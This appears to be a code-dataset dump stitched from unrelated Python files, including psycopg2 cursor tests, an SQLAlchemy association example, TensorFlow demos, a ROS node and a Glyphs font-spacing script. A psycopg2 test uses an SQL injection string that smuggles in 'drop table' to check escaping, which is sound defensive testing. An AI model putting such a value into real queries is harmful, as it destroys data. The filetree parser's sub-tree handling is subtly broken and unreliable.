        self.assertEqual(cur.fetchone(), (8,))
        cur.scroll(-2)
        self.assertEqual(cur.fetchone(), (7,))
        cur.scroll(2, mode='absolute')
        self.assertEqual(cur.fetchone(), (2,))
        # on the boundary
        cur.scroll(0, mode='absolute')
        self.assertEqual(cur.fetchone(), (0,))
        self.assertRaises((IndexError, psycopg2.ProgrammingError),
            cur.scroll, -1, mode='absolute')
        cur.scroll(0, mode='absolute')
        self.assertRaises((IndexError, psycopg2.ProgrammingError),
            cur.scroll, -1)
        cur.scroll(9, mode='absolute')
        self.assertEqual(cur.fetchone(), (9,))
        self.assertRaises((IndexError, psycopg2.ProgrammingError),
            cur.scroll, 10, mode='absolute')
        cur.scroll(9, mode='absolute')
        self.assertRaises((IndexError, psycopg2.ProgrammingError),
            cur.scroll, 1)
    @skip_before_postgres(8, 0)
    def test_scroll_named(self):
        cur = self.conn.cursor('tmp', scrollable=True)
        cur.execute("select generate_series(0,9)")
        cur.scroll(2)
        self.assertEqual(cur.fetchone(), (2,))
        cur.scroll(2)
        self.assertEqual(cur.fetchone(), (5,))
        cur.scroll(2, mode='relative')
        self.assertEqual(cur.fetchone(), (8,))
        cur.scroll(9, mode='absolute')
        self.assertEqual(cur.fetchone(), (9,))
    def test_bad_subclass(self):
        # check that we get an error message instead of a segfault
        # for badly written subclasses.
        # see http://stackoverflow.com/questions/22019341/
        class StupidCursor(psycopg2.extensions.cursor):
            def __init__(self, *args, **kwargs):
                # I am stupid so not calling superclass init
                pass
        cur = StupidCursor()
        self.assertRaises(psycopg2.InterfaceError, cur.execute, 'select 1')
        self.assertRaises(psycopg2.InterfaceError, cur.executemany,
            'select 1', [])
    def test_callproc_badparam(self):
        cur = self.conn.cursor()
        self.assertRaises(TypeError, cur.callproc, 'lower', 42)
    # It would be inappropriate to test callproc's named parameters in the
    # DBAPI2.0 test section because they are a psycopg2 extension.
    @skip_before_postgres(9, 0)
    def test_callproc_dict(self):
        # This parameter name tests for injection and quote escaping
        paramname = '''
            Robert'); drop table "students" --
            '''.strip()
        escaped_paramname = '"%s"' % paramname.replace('"', '""')
        procname = 'pg_temp.randall'
        cur = self.conn.cursor()
        # Set up the temporary function
        cur.execute('''
            CREATE FUNCTION %s(%s INT)
            RETURNS INT AS
            'SELECT $1 * $1'
            LANGUAGE SQL
            ''' % (procname, escaped_paramname))
        # Make sure callproc works right
        cur.callproc(procname, {paramname: 2})
        self.assertEquals(cur.fetchone()[0], 4)
        # Make sure callproc fails right
        failing_cases = [
            ({paramname: 2, 'foo': 'bar'}, psycopg2.ProgrammingError),
            ({paramname: '2'}, psycopg2.ProgrammingError),
            ({paramname: 'two'}, psycopg2.ProgrammingError),
            ({u'bj\xc3rn': 2}, psycopg2.ProgrammingError),
            ({3: 2}, TypeError),
            ({self: 2}, TypeError),
        ]
        for parameter_sequence, exception in failing_cases:
            self.assertRaises(exception, cur.callproc, procname, parameter_sequence)
        self.conn.rollback()
    @skip_if_no_superuser
    @skip_if_windows
    @skip_before_postgres(8, 4)
    def test_external_close_sync(self):
        # If a "victim" connection is closed by a "control" connection
        # behind psycopg2's back, psycopg2 always handles it correctly:
        # raise OperationalError, set conn.closed to 2. This reproduces
        # issue #443, a race between control_conn closing victim_conn and
        # psycopg2 noticing.
        control_conn = self.conn
        connect_func = self.connect
        wait_func = lambda conn: None
        self._test_external_close(control_conn, connect_func, wait_func)
    @skip_if_no_superuser
    @skip_if_windows
    @skip_before_postgres(8, 4)
    def test_external_close_async(self):
        # Issue #443 is in the async code too. Since the fix is duplicated,
        # so is the test.
        control_conn = self.conn
        connect_func = lambda: self.connect(async_=True)
        wait_func = psycopg2.extras.wait_select
        self._test_external_close(control_conn, connect_func, wait_func)
    def _test_external_close(self, control_conn, connect_func, wait_func):
        # The short sleep before using victim_conn the second time makes it
        # much more likely to lose the race and see the bug. Repeating the
        # test several times makes it even more likely.
        for i in range(10):
            victim_conn = connect_func()
            wait_func(victim_conn)
            with victim_conn.cursor() as cur:
                cur.execute('select pg_backend_pid()')
                wait_func(victim_conn)
                pid1 = cur.fetchall()[0][0]
            with control_conn.cursor() as cur:
                cur.execute('select pg_terminate_backend(%s)', (pid1,))
            time.sleep(0.001)
            def f():
                with victim_conn.cursor() as cur:
                    cur.execute('select 1')
                    wait_func(victim_conn)
            self.assertRaises(psycopg2.OperationalError, f)
            self.assertEqual(victim_conn.closed, 2)
    @skip_before_postgres(8, 2)
    def test_rowcount_on_executemany_returning(self):
        cur = self.conn.cursor()
        cur.execute("create table execmany(id serial primary key, data int)")
        cur.executemany(
            "insert into execmany (data) values (%s)",
            [(i,) for i in range(4)])
        self.assertEqual(cur.rowcount, 4)
        cur.executemany(
            "insert into execmany (data) values (%s) returning data",
            [(i,) for i in range(5)])
        self.assertEqual(cur.rowcount, 5)
def test_suite():
    """Build the suite of all tests defined in this module."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)
# Allow running this test module directly with the stdlib runner.
if __name__ == "__main__":
    unittest.main()
| 37.657277 | 84 | 0.611021 |
acfa66d4cff88564de4b3c48809a4b459bf86b29 | 2,151 | py | Python | src/data-model/src/digital/forge/data/models/base_model_.py | jdeyton/forge-keeper | 6e95aed62f77353c365fa4ae8c2c01192a7b2c2e | [
"MIT"
] | null | null | null | src/data-model/src/digital/forge/data/models/base_model_.py | jdeyton/forge-keeper | 6e95aed62f77353c365fa4ae8c2c01192a7b2c2e | [
"MIT"
] | 4 | 2020-08-09T03:28:05.000Z | 2020-08-13T18:48:43.000Z | src/data-model/src/digital/forge/data/models/base_model_.py | jdeyton/forge-keeper | 6e95aed62f77353c365fa4ae8c2c01192a7b2c2e | [
"MIT"
] | null | null | null | # coding: utf-8
"""
This module provides the base class for all models described by the API.
"""
import pprint
import typing
import six
from digital.forge.data import util
# Type variable so from_dict() can declare it returns the concrete subclass.
T = typing.TypeVar('T')
class Model:
    """
    The base class for all models.
    This class is automatically generated! **DO NOT TOUCH!**
    """
    # openapiTypes: The key is attribute name and the
    # value is attribute type.
    openapi_types = {}
    # attributeMap: The key is attribute name and the
    # value is json key in definition.
    attribute_map = {}
    @classmethod
    def from_dict(cls: typing.Type[T], dikt) -> T:
        """Returns the dict as a model"""
        return util.deserialize_model(dikt, cls)
    def to_dict(self):
        """Returns the model properties as a dict
        :rtype: dict
        """
        result = {}
        # Walk the declared attributes, recursing into nested models.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Serialize each list element that is itself a model.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Serialize dict values that are themselves models.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model
        :rtype: str
        """
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return other is not None and \
            isinstance(other, Model) and \
            self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 26.555556 | 74 | 0.550907 |
acfa6847b11d1a6187257e1c104b3b11de26f093 | 510 | py | Python | 16B/16B-236/imaging/concat_and_split.py | e-koch/VLA_Lband | 8fca7b2de0b88ce5c5011b34bf3936c69338d0b0 | [
"MIT"
] | 1 | 2021-03-08T23:19:12.000Z | 2021-03-08T23:19:12.000Z | 16B/16B-236/imaging/concat_and_split.py | e-koch/VLA_Lband | 8fca7b2de0b88ce5c5011b34bf3936c69338d0b0 | [
"MIT"
] | null | null | null | 16B/16B-236/imaging/concat_and_split.py | e-koch/VLA_Lband | 8fca7b2de0b88ce5c5011b34bf3936c69338d0b0 | [
"MIT"
] | null | null | null |
'''
Combine the tracks, then split out the science fields
'''
import os
from glob import glob
from tasks import concat, split
# Grab all of the MS tracks in the folder (should be 12)
myvis = glob("*.speclines.ms")
assert len(myvis) == 12
default('concat')
concat(vis=myvis, concatvis='16B-236_lines_all.ms')
default('split')
split(vis='16B-236_lines_all.ms', outputvis='16B-236_lines.ms',
field='M33*',
datacolumn='corrected',
keepflags=False)
os.system("rm -r 16B-236_lines_all.ms")
| 19.615385 | 63 | 0.701961 |
acfa68d17b4b3104e6de1f71d4307625bf1001f9 | 4,227 | py | Python | fsl/utils/filetree/parse.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 6 | 2018-04-18T03:42:50.000Z | 2021-11-20T18:46:37.000Z | fsl/utils/filetree/parse.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 13 | 2018-10-01T11:45:05.000Z | 2022-03-16T12:28:36.000Z | fsl/utils/filetree/parse.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 5 | 2017-12-09T09:02:17.000Z | 2021-11-15T16:55:30.000Z | import glob
import os.path as op
from . import filetree
from contextlib import contextmanager
from pathlib import PurePath
from typing import Tuple, List
import re
tree_directories = ['.', op.join(op.split(__file__)[0], 'trees')]
@contextmanager
def extra_tree_dirs(extra_dirs):
"""Temporarily insert ``extra_dirs`` to the beginning of :attr:`tree_directories`.
:arg extra_dirs: Sequence of additional tree file directories to search.
"""
global tree_directories
old_tree_directories = list(tree_directories)
tree_directories = list(extra_dirs) + list(tree_directories)
try:
yield
finally:
tree_directories = old_tree_directories
def search_tree(name: str) -> str:
"""
Searches for the file defining the specific tree
Iteratively searches through the directories in ``tree_directories`` till a file named ${name}.tree is found
:param name: Name of the tree
:return: path to the file defining the tree
"""
for directory in tree_directories:
filename = op.join(directory, name)
if op.exists(filename):
return filename
elif op.exists(filename + '.tree'):
return filename + '.tree'
raise ValueError("No file tree found for %s" % name)
def list_all_trees() -> List[str]:
"""Return a list containing paths to all tree files that can be found in
:data:`tree_directories`
"""
trees = []
for directory in tree_directories:
directory = op.abspath(directory)
trees.extend(glob.glob(op.join(directory, '*.tree')))
return trees
def check_forbidden_characters(text, characters, text_type):
"""
Checks the text for forbidden characters
raises ValueError if one is found
:param text: string with the text
:param characters: sequence of forbidden characters
:param text_type: type of the text to raise in error message
"""
bad = [character for character in characters if character in text]
if len(bad) > 0:
raise ValueError('Invalid character(s) "{}" in {}: {}'.format("".join(bad), text_type, text))
def read_line(line: str) -> Tuple[int, PurePath, str]:
"""
Parses line from the tree file
:param line: input line from a ``*.tree`` file
:return: Tuple with:
- number of spaces in front of the name
- name of the file or the sub_tree
- short name of the file
"""
if line.strip()[:1] == '->':
return read_subtree_line(line)
match = re.match(r'^(\s*)(\S*)\s*\((\S*)\)\s*$', line)
if match is not None:
gr = match.groups()
check_forbidden_characters(gr[1], r'<>"/\|?*', 'file or directory name')
check_forbidden_characters(gr[2], r'(){}/', 'short name')
return len(gr[0]), PurePath(gr[1]), gr[2]
match = re.match(r'^(\s*)(\S*)\s*$', line)
if match is not None:
gr = match.groups()
short_name = gr[1].split('.')[0]
check_forbidden_characters(gr[1], r'<>"/\|?*', 'file or directory name')
return len(gr[0]), PurePath(gr[1]), short_name
raise ValueError('Unrecognized line %s' % line)
def read_subtree_line(line: str, directory: str) -> Tuple[int, "filetree.FileTree", str]:
    """
    Parses a ``->``-prefixed line that pulls in a sub-tree.

    :param line: input line from a ``*.tree`` file
    :param directory: containing directory
    :return: Tuple with

        - number of spaces in front of the name
        - sub_tree
        - short name of the sub_tree
    :raises ValueError: if the line does not match the sub-tree syntax
    """
    parsed = re.match(r'^(\s*)->\s*(\S*)(.*)\((\S*)\)', line)
    if parsed is None:
        raise ValueError("Sub-tree line could not be parsed: {}".format(line.strip()))
    spaces, type_name, variables_str, short_name = parsed.groups()
    check_forbidden_characters(type_name, r'<>:"/\|?*', 'sub-tree name')
    check_forbidden_characters(short_name, r'(){}/', 'sub-tree name')
    # Optional "key=value, key=value" assignments between the name and the short name.
    variables = {}
    if variables_str.strip():
        for assignment in variables_str.split(','):
            key, value = assignment.split('=')
            variables[key.strip()] = value.strip()
    sub_tree = filetree.FileTree.read(type_name, directory, **variables)
    return len(spaces), sub_tree, short_name
| 32.267176 | 112 | 0.640407 |
acfa690dd3cd2773608b2752b8cd8e0198448d32 | 1,394 | py | Python | src/viz/rk_api.py | jihoonerd/Robot-Kinematics | 1dd15a07b201929e05c25bb15a26f0e50959c171 | [
"RSA-MD"
] | 1 | 2021-09-28T00:46:44.000Z | 2021-09-28T00:46:44.000Z | src/viz/rk_api.py | jihoonerd/robot_kinematics | 1dd15a07b201929e05c25bb15a26f0e50959c171 | [
"RSA-MD"
] | 2 | 2021-02-15T13:16:13.000Z | 2021-02-15T15:24:15.000Z | src/viz/rk_api.py | jihoonerd/robot_kinematics | 1dd15a07b201929e05c25bb15a26f0e50959c171 | [
"RSA-MD"
] | null | null | null | #!/usr/bin/python
import copy
import numpy as np
import rospy
from robot_kinematics.msg import IKMarker
from rk.robot_preset.biped_robot import half_sitting_biped_ro
from visualization_msgs.msg import MarkerArray
from rk.utils import LinkNode, rpy2rot
from viz.utils import ulink_to_marker_array
from viz.viz_manager import VizManager
ik_target = dict()
def callback(data):
    """ROS subscriber callback: store the requested IK target position, keyed by link id."""
    global ik_target
    # Column vector (3x1) built from the message's target position.
    position = np.array([[data.target_pos.x, data.target_pos.y, data.target_pos.z]]).T
    ik_target[data.link_id] = position
def rk_api():
    """ROS node loop: solves IK for any requested targets and publishes the robot as markers.

    Publishes a MarkerArray of the robot links on ``rk_api/joint`` at 10 Hz and
    listens for IK targets (custom IKMarker messages) on ``rk_api/ik_target``.
    """
    rospy.init_node('rk_pub')
    # Work on a copy so the shared half-sitting preset is never mutated.
    ro = copy.deepcopy(half_sitting_biped_ro)
    pub = rospy.Publisher('rk_api/joint', MarkerArray, queue_size=10)
    sub = rospy.Subscriber('rk_api/ik_target', IKMarker, callback=callback) # use custom message
    viz_manager = VizManager()
    # Pre-register interactive IK targets for links 7 and 13 (the two feet of the biped preset — TODO confirm).
    viz_manager.add_ik_target('7')
    viz_manager.add_ik_target('13')
    rate = rospy.Rate(10)
    while not rospy.is_shutdown():
        # ik_target is the module-level dict filled by callback(); solve IK for each pending target.
        if ik_target:
            for link_id in ik_target:
                ro.inverse_kinematics_LM(int(link_id), LinkNode(id=-1, name=link_id + '_target', p=ik_target[link_id], R=rpy2rot(0, 0, 0))) # R4,5,6 rotation: use IK target or rotation, whichever is easier to implement (translated from Korean)
        marker_array = ulink_to_marker_array(ro.ulink)
        pub.publish(marker_array)
        rate.sleep()
if __name__ == '__main__':
    # Run the node; shutdown (e.g. Ctrl-C) raises ROSInterruptException, which is expected.
    try:
        rk_api()
    except rospy.ROSInterruptException:
        pass
| 29.041667 | 188 | 0.714491 |
acfa692d2d4674048702af9edd9eda7b981aa5e8 | 4,576 | py | Python | examples/01_association/01_basic_association.py | lanzhiwang/sqlalchemy | c4b07f75baa68005f41244372e97dc1c591f45da | [
"MIT"
] | null | null | null | examples/01_association/01_basic_association.py | lanzhiwang/sqlalchemy | c4b07f75baa68005f41244372e97dc1c591f45da | [
"MIT"
] | null | null | null | examples/01_association/01_basic_association.py | lanzhiwang/sqlalchemy | c4b07f75baa68005f41244372e97dc1c591f45da | [
"MIT"
] | null | null | null | """Illustrate a many-to-many relationship between an
"Order" and a collection of "Item" objects, associating a purchase price
with each via an association object called "OrderItem"
The association object pattern is a form of many-to-many which
associates additional data with each association between parent/child.
The example illustrates an "order", referencing a collection
of "items", with a particular price paid associated with each "item".
"""
from datetime import datetime
from sqlalchemy import and_
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import DateTime
from sqlalchemy import Float
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy.orm import Session
Base = declarative_base()
"""
CREATE TABLE "order" (
order_id INTEGER NOT NULL,
customer_name VARCHAR(30) NOT NULL,
order_date DATETIME NOT NULL,
PRIMARY KEY (order_id)
)
CREATE TABLE item (
item_id INTEGER NOT NULL,
description VARCHAR(30) NOT NULL,
price FLOAT NOT NULL,
PRIMARY KEY (item_id)
)
CREATE TABLE orderitem (
order_id INTEGER NOT NULL,
item_id INTEGER NOT NULL,
price FLOAT NOT NULL,
PRIMARY KEY (order_id, item_id),
FOREIGN KEY(order_id) REFERENCES "order" (order_id),
FOREIGN KEY(item_id) REFERENCES item (item_id)
)
"""
class Order(Base):
    """A customer order; owns a collection of OrderItem associations.

    Deleting an Order also deletes its OrderItem rows (``delete-orphan`` cascade).
    """

    __tablename__ = "order"
    order_id = Column(Integer, primary_key=True)
    customer_name = Column(String(30), nullable=False)
    # BUGFIX: pass the callable, not its result. ``default=datetime.now()`` is
    # evaluated ONCE at class-definition time, so every order would share the
    # same timestamp; SQLAlchemy calls ``datetime.now`` per INSERT instead.
    order_date = Column(DateTime, nullable=False, default=datetime.now)
    order_items = relationship(
        "OrderItem", cascade="all, delete-orphan", backref="order"
    )

    def __init__(self, customer_name):
        self.customer_name = customer_name
class Item(Base):
    """A purchasable catalog item with a description and a list price."""

    __tablename__ = "item"
    item_id = Column(Integer, primary_key=True)
    description = Column(String(30), nullable=False)
    price = Column(Float, nullable=False)

    def __init__(self, description, price):
        self.description = description
        self.price = price

    def __repr__(self):
        return "Item({0!r}, {1!r})".format(self.description, self.price)
class OrderItem(Base):
    """Association object linking an Order to an Item, recording the price paid."""

    __tablename__ = "orderitem"
    order_id = Column(Integer, ForeignKey("order.order_id"), primary_key=True)
    item_id = Column(Integer, ForeignKey("item.item_id"), primary_key=True)
    price = Column(Float, nullable=False)

    def __init__(self, item, price=None):
        self.item = item
        # BUGFIX: fall back to the catalog price only when no price was given.
        # The previous ``price or item.price`` silently discarded an explicit
        # price of 0.0 (a free item).
        self.price = item.price if price is None else price

    # Eagerly load the item with the association row (single joined query).
    item = relationship(Item, lazy="joined")
if __name__ == "__main__":
    # Demo: create a SQLite catalog, place an order, and run example queries.
    engine = create_engine('sqlite:///cookies.db')
    Base.metadata.create_all(engine)
    session = Session(engine)

    # create catalog
    tshirt, mug, hat, crowbar = (
        Item("SA T-Shirt", 10.99),
        Item("SA Mug", 6.50),
        Item("SA Hat", 8.99),
        Item("MySQL Crowbar", 16.99),
    )
    session.add_all([tshirt, mug, hat, crowbar])
    session.commit()

    # create an order
    order = Order("john smith")

    # add three OrderItem associations to the Order and save
    # (the crowbar is sold below its 16.99 catalog price)
    order.order_items.append(OrderItem(mug))
    order.order_items.append(OrderItem(crowbar, 10.99))
    order.order_items.append(OrderItem(hat))
    session.add(order)
    session.commit()

    # query the order, print items
    # (printing a Query object shows the SQL it would emit — see below)
    query = session.query(Order).filter_by(customer_name="john smith")
    print(query)
    """
    SELECT "order".order_id AS order_order_id, "order".customer_name AS order_customer_name, "order".order_date AS order_order_date
    FROM "order"
    WHERE "order".customer_name = ?
    """

    order = query.one()
    print(
        [
            (order_item.item.description, order_item.price)
            for order_item in order.order_items
        ]
    )
    """
    [('SA Mug', 6.5), ('SA Hat', 8.99), ('MySQL Crowbar', 10.99)]
    """

    # print customers who bought 'MySQL Crowbar' on sale
    # (price paid in the association row is lower than the catalog price)
    q = session.query(Order).join("order_items", "item")
    q = q.filter(
        and_(Item.description == "MySQL Crowbar", Item.price > OrderItem.price)
    )
    print(q)
    """
    SELECT
        "order".order_id AS order_order_id,
        "order".customer_name AS order_customer_name,
        "order".order_date AS order_order_date
    FROM "order"
    JOIN orderitem ON "order".order_id = orderitem.order_id
    JOIN item ON item.item_id = orderitem.item_id
    WHERE item.description = ? AND item.price > orderitem.price
    """
    print([order.customer_name for order in q])
| 28.6 | 131 | 0.6934 |
acfa6968a5dd402d5139b42ca86657a298c9a1bf | 818 | py | Python | tf/02_lazy_loading.py | rxy007/python_code | ed98915e24ef588748ae47790ca89292b5e9bfd2 | [
"MIT"
] | 11 | 2018-12-19T01:48:33.000Z | 2022-03-25T14:24:07.000Z | tf/02_lazy_loading.py | rxy007/python_code | ed98915e24ef588748ae47790ca89292b5e9bfd2 | [
"MIT"
] | null | null | null | tf/02_lazy_loading.py | rxy007/python_code | ed98915e24ef588748ae47790ca89292b5e9bfd2 | [
"MIT"
] | 2 | 2020-01-01T02:40:18.000Z | 2021-12-10T10:33:21.000Z | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
# normal loading
# The add op is created ONCE, before the session; each sess.run(z) reuses it,
# so the graph contains a single Add node.
x = tf.Variable(10, name='x')
y = tf.Variable(20, name='y')
z = tf.add(x, y)
init = tf.global_variables_initializer()
with tf.Session() as sess:
    sess.run(init)
    writer = tf.summary.FileWriter('graphs/normal_loading', sess.graph)
    for _ in range(10):
        sess.run(z)
    # Dump the graph definition to show it holds only one Add node.
    print(tf.get_default_graph().as_graph_def())
    writer.close()
# lazy loading
# This approach may cause the graph to bloat and eventually exhaust memory:
# tf.add() inside the loop creates a NEW Add node on every iteration.
x = tf.Variable(10, name='x')
y = tf.Variable(20, name='y')
init = tf.global_variables_initializer()
with tf.Session() as sess:
    sess.run(init)
    writer = tf.summary.FileWriter('graphs/lazy_loading', sess.graph)
    for _ in range(10):
        # Creating the op here adds 10 Add nodes to the graph (one per run).
        sess.run(tf.add(x, y))
    print(tf.get_default_graph().as_graph_def())
    writer.close()
| 22.722222 | 71 | 0.672372 |
acfa69dd7cf7609377aa847b4f3364cdbebe1036 | 15,053 | py | Python | Kerning/GapFinder.py | NaN-xyz/Glyphs-Scripts | bdacf455babc72e0801d8d8db5dc10f8e88aa37b | [
"Apache-2.0"
] | 1 | 2022-01-09T04:28:36.000Z | 2022-01-09T04:28:36.000Z | Kerning/GapFinder.py | NaN-xyz/Glyphs-Scripts | bdacf455babc72e0801d8d8db5dc10f8e88aa37b | [
"Apache-2.0"
] | null | null | null | Kerning/GapFinder.py | NaN-xyz/Glyphs-Scripts | bdacf455babc72e0801d8d8db5dc10f8e88aa37b | [
"Apache-2.0"
] | null | null | null | #MenuTitle: GapFinder
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__="""
Opens a new tab with kerning combos that have large gaps in the current fontmaster.
"""
import vanilla
from timeit import default_timer as timer
from Foundation import NSNotFound
intervalList = (1,3,5,10,20)
categoryList = (
"Letter:Uppercase",
"Letter:Lowercase",
"Letter:Smallcaps",
"Punctuation",
"Symbol:Currency",
"Symbol:Math",
"Symbol:Other",
"Symbol:Arrow",
"Number:Decimal Digit",
"Number:Small",
"Number:Fraction",
)
class GapFinder( object ):
	"""Vanilla UI for finding kerning pairs with overly large gaps in the current Glyphs master.

	Measures the minimum visual distance (sidebearings plus effective kerning)
	between glyph pairs from two user-chosen categories, and opens an Edit tab
	listing every pair whose gap exceeds the chosen maximum distance.
	"""
	def __init__( self ):
		"""Builds the floating settings window and loads stored preferences."""
		# Window 'self.w':
		windowWidth = 390
		windowHeight = 260
		windowWidthResize = 800 # user can resize width by this value
		windowHeightResize = 0 # user can resize height by this value
		self.w = vanilla.FloatingWindow(
			( windowWidth, windowHeight ), # default window size
			"GapFinder", # window title
			minSize = ( windowWidth, windowHeight ), # Maximum size (for resizing)
			maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
			autosaveName = "com.mekkablue.GapFinder.mainwindow" # stores last window position and size
		)
		# UI elements:
		linePos, inset, lineHeight = 12, 15, 22
		self.w.descriptionText = vanilla.TextBox( (inset, linePos+2, -inset, 14), u"Open tab with kern gaps in current master:", sizeStyle='small', selectable=True )
		linePos += lineHeight
		self.w.textScript = vanilla.TextBox( (inset, linePos+2, 42, 14), u"Script:", sizeStyle='small', selectable=True )
		self.w.popupScript = vanilla.ComboBox( (inset+42, linePos-1, 110, 18), ("latin","cyrillic","greek"), callback=self.SavePreferences, sizeStyle='small' )
		self.w.textDistance = vanilla.TextBox( (inset+160, linePos+2, 100, 14), "Max distance:", sizeStyle='small' )
		self.w.maxDistance = vanilla.EditText( (inset+240, linePos-1, -15, 19), "200", sizeStyle='small')
		linePos += lineHeight
		self.w.textSpeed = vanilla.TextBox( (inset, linePos+2, 42, 14), u"Speed:", sizeStyle='small', selectable=True )
		self.w.popupSpeed = vanilla.PopUpButton( (inset+42, linePos, 110, 17), ("very slow","slow","medium","fast","very fast"), callback=self.SavePreferences, sizeStyle='small' )
		# Speed index maps into the module-level intervalList (measuring interval in units).
		intervalIndex = Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"]
		if intervalIndex is None:
			intervalIndex = 0
		self.w.text_speedExplanation = vanilla.TextBox( (inset+160, linePos+2, -inset, 14), "Measuring every %i units."%intervalList[intervalIndex], sizeStyle='small' )
		linePos += lineHeight
		self.w.text_3 = vanilla.TextBox( (inset, linePos+2, 90, 14), "Left Category:", sizeStyle='small' )
		self.w.popupLeftCat = vanilla.PopUpButton( (inset+90, linePos, -inset, 17), categoryList, callback=self.SavePreferences, sizeStyle='small' )
		linePos += lineHeight
		self.w.text_4 = vanilla.TextBox( (inset, linePos+2, 90, 14), "Right Category:", sizeStyle='small' )
		self.w.popupRightCat = vanilla.PopUpButton( (inset+90, linePos, -inset, 17), categoryList, callback=self.SavePreferences, sizeStyle='small' )
		linePos += lineHeight
		self.w.text_5 = vanilla.TextBox( (inset, linePos+2, 160, 14), "Exclude glyphs containing:", sizeStyle='small' )
		self.w.excludeSuffixes = vanilla.EditText( (inset+150, linePos, -inset, 19), ".locl, .alt, .sups, .sinf, .tf, .tosf, Ldot, ldot, Jacute, jacute", callback=self.SavePreferences, sizeStyle='small')
		linePos += lineHeight
		self.w.excludeNonExporting = vanilla.CheckBox( (inset, linePos, -inset, 20), "Exclude non-exporting glyphs", value=True, sizeStyle='small', callback=self.SavePreferences )
		linePos += lineHeight
		self.w.reportGapsInMacroWindow = vanilla.CheckBox( (inset, linePos, -inset, 20), "Also report in Macro Window (a few seconds slower)", value=False, sizeStyle='small', callback=self.SavePreferences )
		linePos += lineHeight
		# Percentage:
		self.w.bar = vanilla.ProgressBar((inset, linePos, -inset, 16))
		#self.w.percentage = vanilla.TextBox( (15-1, -30, -100-15, -15), "", sizeStyle='small' )
		# Run Button:
		self.w.runButton = vanilla.Button((-100-15, -20-15, -15, -15), "Open Tab", sizeStyle='regular', callback=self.GapFinderMain )
		self.w.setDefaultButton( self.w.runButton )
		# Load Settings:
		if not self.LoadPreferences():
			print("Note: 'GapFinder' could not load preferences. Will resort to defaults")
		# Open window and focus on it:
		self.w.open()
		self.w.makeKey()
	def SavePreferences( self, sender ):
		"""Stores the current UI values in the Glyphs preferences; returns False on failure."""
		try:
			Glyphs.defaults["com.mekkablue.GapFinder.popupScript"] = self.w.popupScript.get()
			Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"] = self.w.popupSpeed.get()
			Glyphs.defaults["com.mekkablue.GapFinder.popupLeftCat"] = self.w.popupLeftCat.get()
			Glyphs.defaults["com.mekkablue.GapFinder.popupRightCat"] = self.w.popupRightCat.get()
			Glyphs.defaults["com.mekkablue.GapFinder.excludeSuffixes"] = self.w.excludeSuffixes.get()
			Glyphs.defaults["com.mekkablue.GapFinder.excludeNonExporting"] = self.w.excludeNonExporting.get()
			Glyphs.defaults["com.mekkablue.GapFinder.maxDistance"] = self.w.maxDistance.get()
			Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"] = self.w.reportGapsInMacroWindow.get()
		except Exception as e:
			return False
		# update speed explanation:
		if sender == self.w.popupSpeed:
			intervalIndex = Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"]
			if intervalIndex is None:
				intervalIndex = 0
			self.w.text_speedExplanation.set( "Measuring every %i units." % intervalList[intervalIndex] )
		return True
	def LoadPreferences( self ):
		"""Registers preference defaults and restores the UI from stored values; returns False on failure."""
		try:
			Glyphs.registerDefault( "com.mekkablue.GapFinder.maxDistance", "200" )
			Glyphs.registerDefault( "com.mekkablue.GapFinder.popupScript", "latin" )
			Glyphs.registerDefault( "com.mekkablue.GapFinder.popupSpeed", 0 )
			Glyphs.registerDefault( "com.mekkablue.GapFinder.popupLeftCat", 0 )
			Glyphs.registerDefault( "com.mekkablue.GapFinder.popupRightCat", 0 )
			Glyphs.registerDefault( "com.mekkablue.GapFinder.excludeSuffixes", ".locl, .alt, .sups, .sinf, .tf, .tosf, Ldot, ldot, Jacute, jacute" )
			Glyphs.registerDefault( "com.mekkablue.GapFinder.excludeNonExporting", 1 )
			Glyphs.registerDefault( "com.mekkablue.GapFinder.reportGapsInMacroWindow", 0 )
			self.w.maxDistance.set( Glyphs.defaults["com.mekkablue.GapFinder.maxDistance"] )
			self.w.popupScript.set( Glyphs.defaults["com.mekkablue.GapFinder.popupScript"] )
			self.w.popupSpeed.set( Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"] )
			self.w.popupLeftCat.set( Glyphs.defaults["com.mekkablue.GapFinder.popupLeftCat"] )
			self.w.popupRightCat.set( Glyphs.defaults["com.mekkablue.GapFinder.popupRightCat"] )
			self.w.excludeSuffixes.set( Glyphs.defaults["com.mekkablue.GapFinder.excludeSuffixes"] )
			self.w.excludeNonExporting.set( Glyphs.defaults["com.mekkablue.GapFinder.excludeNonExporting"] )
			self.w.reportGapsInMacroWindow.set( Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"] )
		except:
			return False
		return True
	def nameUntilFirstPeriod( self, glyphName ):
		"""Returns the glyph name truncated before its first period (suffix stripped)."""
		if not "." in glyphName:
			return glyphName
		else:
			offset = glyphName.find(".")
